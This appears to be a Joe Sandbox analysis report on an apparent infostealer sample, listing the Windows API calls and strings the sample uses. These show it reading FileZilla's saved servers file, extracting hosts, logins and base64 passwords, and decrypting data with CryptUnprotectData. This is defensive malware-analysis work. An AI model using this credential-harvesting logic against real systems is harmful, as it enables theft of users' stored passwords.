                                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00815155,00000000,00000000), ref: 00819D56
                                                • LocalAlloc.KERNEL32(00000040,?,?,?,00815155,00000000,?), ref: 00819D68
                                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00815155,00000000,00000000), ref: 00819D91
                                                • LocalFree.KERNEL32(?,?,?,?,00815155,00000000,?), ref: 00819DA6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: BinaryCryptLocalString$AllocFree
                                                • String ID:
                                                • API String ID: 4291131564-0
                                                • Opcode ID: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                • Instruction ID: 916a129e6b92d99284fb4a9052e317fa04528ece5bff8eece0e374618ab8571e
                                                • Opcode Fuzzy Hash: ac1203beb7ec4e86d603382bfe2e0b1b189ebd62ea0cb8a2a83c29bdd00d5e6f
                                                • Instruction Fuzzy Hash: 5611A4B4240208BFEB10CFA4DC95FAA77B9FB89704F208058FD159B390C776A941CB90
                                                APIs
                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00819DEB
                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00819E0A
                                                • memcpy.MSVCRT(?,?,?), ref: 00819E2D
                                                • LocalFree.KERNEL32(?), ref: 00819E3A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                • String ID:
                                                • API String ID: 3243516280-0
                                                • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                • Instruction ID: 54e531264da74ed8eda34d2d059c8b8374d9a828be2d85caf845aaae8b8e0934
                                                • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                • Instruction Fuzzy Hash: 7E11F7B8A00209EFDB04CFA8D985AEEB7B9FF89300F104558E915A7350D770AE50CFA1
                                                APIs
                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                                                • memcpy.MSVCRT(?,?,?), ref: 00409BC6
                                                • LocalFree.KERNEL32(?), ref: 00409BD3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Local$AllocCryptDataFreeUnprotectmemcpy
                                                • String ID:
                                                • API String ID: 3243516280-0
                                                • Opcode ID: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                • Instruction ID: 8471c3d920f6d21a6ca128c50317bdd839bed9d1cf50ed0ddd6ab59e3c77a746
                                                • Opcode Fuzzy Hash: c2aa43b9e4297819a9d52390c0c53cdff2035cd243deeef131e769104903eb95
                                                • Instruction Fuzzy Hash: 46110CB8A00209EFDB04DF94D985AAE77B6FF89300F104569F915A7390D774AE10CF61
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,008C92F8,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00417A63
                                                • HeapAlloc.KERNEL32(00000000,?,?,?,00000000,00000000,?,008C92F8,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A6A
                                                • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,008C92F8,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00417A7D
                                                • wsprintfA.USER32 ref: 00417AB7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                • String ID:
                                                • API String ID: 362916592-0
                                                • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                • Instruction ID: 8af700d3b0e32b47e9d6ddd9198ddf9a5cfc8e3ba9127fd648bfb7377b14e362
                                                • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                • Instruction Fuzzy Hash: 461152B1A45228EFEB108B54DC45F9AB7B8FB05711F10439AE516932C0D7785A40CF55
                                                APIs
                                                • CoCreateInstance.COMBASE(0041E118,00000000,00000001,0041E108,00000000), ref: 00413758
                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004137B0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharCreateInstanceMultiWide
                                                • String ID:
                                                • API String ID: 123533781-0
                                                • Opcode ID: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                                • Instruction ID: 95f6a265596bdc049295610fa53daf8ef9ce5e7415083cbf30a8e52d2e28a0c3
                                                • Opcode Fuzzy Hash: 634e478c758f94cb0cd26d84ba9f3abb63f0756ecf75599706a634363863d21a
                                                • Instruction Fuzzy Hash: A941F474A40A28AFDB24DF58CC94BDAB7B5BB48306F4041D9A608A72D0E771AEC5CF50
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: .$GetProcAddress.$l
                                                • API String ID: 0-2784972518
                                                • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                • Instruction ID: a7102a0f231689fd65fa398c2c22b4531c2a6e7a60fdd3dc0dfb7c8f969c8fff
                                                • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                • Instruction Fuzzy Hash: DD3118B6900619DFDB10CF99C880AEDBBF9FF48324F25414AD441E7211D7B1AA85CFA4
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(0041CEA8), ref: 0082D156
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                                • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                                                • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                                • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(Function_0001CEA8), ref: 0041CEEF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                                • Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
                                                • Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
                                                • Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241173522.000000000089A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0089A000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_89a000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                • Instruction ID: bc811601979a856c970f4a17f6b204d3b75d2b37fc8efd7ae1bf3e3416f8b81c
                                                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                • Instruction Fuzzy Hash: 3F115272340104AFDB54EF59DC85EA673EAFB89324B298055ED04CF316D679EC41C7A1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                • Instruction ID: 3178929b01d798fa34d4ef378dbf52f0378e04f11d2b01edb067f4173028140d
                                                • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                • Instruction Fuzzy Hash: CC01DF72A006048FDB21CF60DC04BEA33A9FF86306F1545A4D90AD7285E3B0A8C18F80
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                                • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                                • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                                • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: free
                                                • String ID:
                                                • API String ID: 1294909896-0
                                                • Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                • Instruction ID: 3f044f01c40b9ce0c563b07df49cd4f3cef513aa252351c6c72d6e4184116361
                                                • Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
                                                • Instruction Fuzzy Hash: 5171E531451B60DBD7E73B39FD03E497AA2FF04B02F104914B1D7A8D329A2268E59B53
                                                APIs
                                                  • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                  • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                  • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                  • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                  • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                  • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                  • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                  • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                  • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                  • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                  • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                  • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                  • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                • strtok_s.MSVCRT ref: 0041031B
                                                • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410369
                                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
                                                • lstrlenA.KERNEL32(00000000), ref: 00410393
                                                  • Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
                                                  • Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903
                                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
                                                • lstrlenA.KERNEL32(00000000), ref: 004103DD
                                                • StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
                                                • lstrlenA.KERNEL32(00000000), ref: 00410427
                                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
                                                • lstrlenA.KERNEL32(00000000), ref: 00410475
                                                • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
                                                • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041051A
                                                • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410532
                                                • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041054A
                                                • lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00410562
                                                • lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00410571
                                                • lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00410580
                                                • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410593
                                                • lstrcatA.KERNEL32(?,00421678,?,?,00000000), ref: 004105A2
                                                • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105B5
                                                • lstrcatA.KERNEL32(?,0042167C,?,?,00000000), ref: 004105C4
                                                • lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 004105D3
                                                • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105E6
                                                • lstrcatA.KERNEL32(?,00421688,?,?,00000000), ref: 004105F5
                                                • lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410604
                                                • lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410617
                                                • lstrcatA.KERNEL32(?,00421698,?,?,00000000), ref: 00410626
                                                • lstrcatA.KERNEL32(?,0042169C,?,?,00000000), ref: 00410635
                                                • strtok_s.MSVCRT ref: 00410679
                                                • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
                                                • memset.MSVCRT ref: 004106DD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                                • API String ID: 337689325-514892060
                                                • Opcode ID: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                                • Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
                                                • Opcode Fuzzy Hash: a8872f9b9bb1cb9e478c25673be1377050816f1e4d9c1e82bbed77d0740d0bab
                                                • Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69
                                                APIs
                                                • lstrlen.KERNEL32(00424D98), ref: 00814833
                                                • lstrlen.KERNEL32(00424E48), ref: 0081483E
                                                • lstrlen.KERNEL32(00424F10), ref: 00814849
                                                • lstrlen.KERNEL32(00424FC8), ref: 00814854
                                                • lstrlen.KERNEL32(00425070), ref: 0081485F
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 0081486E
                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00814875
                                                • lstrlen.KERNEL32(00425118), ref: 00814883
                                                • lstrlen.KERNEL32(004251C0), ref: 0081488E
                                                • lstrlen.KERNEL32(00425268), ref: 00814899
                                                • lstrlen.KERNEL32(00425310), ref: 008148A4
                                                • lstrlen.KERNEL32(004253B8), ref: 008148AF
                                                • lstrlen.KERNEL32(00425460), ref: 008148C3
                                                • lstrlen.KERNEL32(00425508), ref: 008148CE
                                                • lstrlen.KERNEL32(004255B0), ref: 008148D9
                                                • lstrlen.KERNEL32(00425658), ref: 008148E4
                                                • lstrlen.KERNEL32(00425700), ref: 008148EF
                                                • lstrlen.KERNEL32(004257A8), ref: 00814918
                                                • lstrlen.KERNEL32(00425850), ref: 00814923
                                                • lstrlen.KERNEL32(00425918), ref: 0081492E
                                                • lstrlen.KERNEL32(004259C0), ref: 00814939
                                                • lstrlen.KERNEL32(00425A68), ref: 00814944
                                                • strlen.MSVCRT ref: 00814957
                                                • lstrlen.KERNEL32(00425B10), ref: 0081497F
                                                • lstrlen.KERNEL32(00425BB8), ref: 0081498A
                                                • lstrlen.KERNEL32(00425C60), ref: 00814995
                                                • lstrlen.KERNEL32(00425D08), ref: 008149A0
                                                • lstrlen.KERNEL32(00425DB0), ref: 008149AB
                                                • lstrlen.KERNEL32(00425E58), ref: 008149BB
                                                • lstrlen.KERNEL32(00425F00), ref: 008149C6
                                                • lstrlen.KERNEL32(00425FA8), ref: 008149D1
                                                • lstrlen.KERNEL32(00426050), ref: 008149DC
                                                • lstrlen.KERNEL32(004260F8), ref: 008149E7
                                                • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00814A03
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                                • String ID:
                                                • API String ID: 2127927946-0
                                                • Opcode ID: 94e7660d446ef400bbca7e6a05bf8504b75a8e0329621672810e0e1d9e7bb62d
                                                • Instruction ID: ae4a6b251b2fc9c1804171e9360c36fc24acdcd8dec49b3696073522c61b6c8c
                                                • Opcode Fuzzy Hash: 94e7660d446ef400bbca7e6a05bf8504b75a8e0329621672810e0e1d9e7bb62d
                                                • Instruction Fuzzy Hash: B441CA79740624EBC718AFE5EC8DB987F74AB4C712BA0C062F9029A190C7F5D5019B3E
                                                APIs
                                                • GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 00829B08
                                                • GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 00829B21
                                                • GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 00829B39
                                                • GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 00829B51
                                                • GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 00829B6A
                                                • GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 00829B82
                                                • GetProcAddress.KERNEL32(0064A8B0,0064A4D4), ref: 00829B9A
                                                • GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 00829BB3
                                                • GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 00829BCB
                                                • GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 00829BE3
                                                • GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 00829BFC
                                                • GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 00829C14
                                                • GetProcAddress.KERNEL32(0064A8B0,0064A60C), ref: 00829C2C
                                                • GetProcAddress.KERNEL32(0064A8B0,0064A0B0), ref: 00829C45
                                                • GetProcAddress.KERNEL32(0064A8B0,0064A598), ref: 00829C5D
                                                • GetProcAddress.KERNEL32(0064A8B0,0064A224), ref: 00829C75
                                                • GetProcAddress.KERNEL32(0064A8B0,0064A418), ref: 00829C8E
                                                • GetProcAddress.KERNEL32(0064A8B0,0064A634), ref: 00829CA6
                                                • GetProcAddress.KERNEL32(0064A8B0,0064A0BC), ref: 00829CBE
                                                • GetProcAddress.KERNEL32(0064A8B0,0064A12C), ref: 00829CD7
                                                • GetProcAddress.KERNEL32(0064A8B0,0064A2B0), ref: 00829CEF
                                                • LoadLibraryA.KERNEL32(0064A550,?,00826C67), ref: 00829D01
                                                • LoadLibraryA.KERNEL32(0064A17C,?,00826C67), ref: 00829D12
                                                • LoadLibraryA.KERNEL32(0064A104,?,00826C67), ref: 00829D24
                                                • LoadLibraryA.KERNEL32(0064A1DC,?,00826C67), ref: 00829D36
                                                • LoadLibraryA.KERNEL32(0064A328,?,00826C67), ref: 00829D47
                                                • GetProcAddress.KERNEL32(0064A6D4,0064A4AC), ref: 00829D69
                                                • GetProcAddress.KERNEL32(0064A7F4,0064A424), ref: 00829D8A
                                                • GetProcAddress.KERNEL32(0064A7F4,0064A1CC), ref: 00829DA2
                                                • GetProcAddress.KERNEL32(0064A8E4,0064A394), ref: 00829DC4
                                                • GetProcAddress.KERNEL32(0064A7A8,0064A128), ref: 00829DE5
                                                • GetProcAddress.KERNEL32(0064A7D8,0064A414), ref: 00829E06
                                                • GetProcAddress.KERNEL32(0064A7D8,00420724), ref: 00829E1D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressProc$LibraryLoad
                                                • String ID:
                                                • API String ID: 2238633743-0
                                                • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                • Instruction ID: 3cf3acc1044c41f3ebc8d841e18e7525f26bc8801e3f102bfb95a2ffcc739200
                                                • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                                • Instruction Fuzzy Hash: 57A13BBD5C0240BFE364EFE8ED889A63BFBF74E301714661AE605C3264D6399841DB52
                                                APIs
                                                  • Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF
                                                  • Part of subcall function 00829047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00829072
                                                  • Part of subcall function 0082AB87: lstrcpy.KERNEL32(00000000,?), ref: 0082ABD9
                                                  • Part of subcall function 0082AB87: lstrcat.KERNEL32(00000000), ref: 0082ABE9
                                                  • Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C
                                                  • Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
                                                  • Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
                                                  • Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79
                                                  • Part of subcall function 0082AA07: lstrcpy.KERNEL32(?,00000000), ref: 0082AA4D
